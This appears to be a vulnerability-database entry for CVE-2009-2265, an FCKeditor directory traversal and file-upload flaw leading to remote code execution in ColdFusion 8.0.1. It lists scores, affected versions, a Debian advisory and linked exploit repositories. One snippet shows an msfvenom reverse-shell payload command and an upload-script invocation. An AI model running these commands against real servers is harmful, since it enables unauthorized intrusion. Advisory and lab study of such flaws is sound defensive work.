7.5
CVSSv2

CVE-2009-2265

Published: 05/07/2009 Updated: 24/06/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 757
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple directory traversal vulnerabilities in FCKeditor prior to 2.6.4.1 allow remote malicious users to create executable files in arbitrary directories via directory traversal sequences in the input to unspecified connector modules, as exploited in the wild for remote code execution in July 2009, related to the file browser and the editor/filemanager/connectors/ directory.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

fckeditor fckeditor

fckeditor fckeditor 2.4.3

fckeditor fckeditor 2.5.1

fckeditor fckeditor 2.5

fckeditor fckeditor 2.3

fckeditor fckeditor 2.1.1

fckeditor fckeditor 2.0_rc2

fckeditor fckeditor 2.0rc2

fckeditor fckeditor 2.6.3

fckeditor fckeditor 2.6.2

fckeditor fckeditor 2.4

fckeditor fckeditor 2.3.3

fckeditor fckeditor 2.0

fckeditor fckeditor 2.0_fc

fckeditor fckeditor 2.4.2

fckeditor fckeditor 2.4.1

fckeditor fckeditor 2.1

fckeditor fckeditor 2.6.4

fckeditor fckeditor 2.0rc3

fckeditor fckeditor 2.2

fckeditor fckeditor 2.6.1

fckeditor fckeditor 2.6

fckeditor fckeditor 2.3.2

fckeditor fckeditor 2.3.1

Vendor Advisories

Debian Bug report logs - #536051 CVE-2009-2265, CVE-2009-2324: input sanitization errors Package: fckeditor; Maintainer for fckeditor is (unknown); Reported by: Giuseppe Iuculano <giuseppe@iuculanoit> Date: Tue, 7 Jul 2009 06:45:01 UTC Severity: grave Tags: lenny, security Found in version fckeditor/1:262-1 Fixed in v ...
Vinny Guido discovered that multiple input sanitising vulnerabilities in Fckeditor, a rich text web editor component, may lead to the execution of arbitrary code The old stable distribution (etch) doesn't contain fckeditor For the stable distribution (lenny), this problem has been fixed in version 1:262-1lenny1 For the unstable distribution (s ...

Exploits

## # $Id: coldfusion_fckeditorrb 11127 2010-11-24 19:35:38Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' ...
Adobe ColdFusion 8 remote command execution exploit ...

Github Repositories

cf8-upload.py | CVE-2009-2265

cf8-uploadpy ⭐ a python3 script to exploit CVE-2009-2265 the exploit - CVE-2009-2265 ❗ the script exploits a vulnerability found in FCKeditor < 2641 which was implemented into adobe coldfusion 801: cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2009-2265 the script allows the user to submit a file to upload to a target computer running coldfusion 801 an

ColdFusion 8.0.1 - Arbitrary File Upload to RCE

ExploitDev Journey #1 | CVE-2009-2265 | ColdFusion 801 - Arbitrary File Upload / RCE Original: wwwexploit-dbcom/exploits/16788 Exploit name: ColdFusion 801 - Arbitrary File Upload / RCE CVE: 2009-2265 Lab: Arctic - HackTheBox Description This exploit allows unauthenticated users to upload files and gain remote code execution on the target host The vulnerabilit

ColdFusion 8.0.1 - Arbitrary File Upload to RCE

ExploitDev Journey #1 | CVE-2009-2265 | ColdFusion 801 - Arbitrary File Upload / RCE Original: wwwexploit-dbcom/exploits/16788 Exploit name: ColdFusion 801 - Arbitrary File Upload / RCE CVE: 2009-2265 Lab: Arctic - HackTheBox Description This exploit allows unauthenticated users to upload files and gain remote code execution on the target host The vulnerabilit

Version: ColdFusion 801 CVE-2009-2265 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10101412 LPORT=4444 -f raw > shelljsp python uploadpy 10101011 8500 shelljsp Example :

cf8-upload.py | CVE-2009-2265

cf8-uploadpy ⭐ a python3 script to exploit CVE-2009-2265 the exploit - CVE-2009-2265 ❗ the script exploits a vulnerability found in FCKeditor < 2641 which was implemented into adobe coldfusion 801: cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2009-2265 the script allows the user to submit a file to upload to a target computer running coldfusion 801 an

coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/

zaphoxx-coldfusion coldfusion exploit based on cvedetailscom/cve/CVE-2009-2265/ The main reason I setup a python script for this particular cve was that the metasploit version of the same did not work for me when I tried to solve the HTB machine Arctic Also it was nice to get some little python pratice However there is another python version of that same exploit arou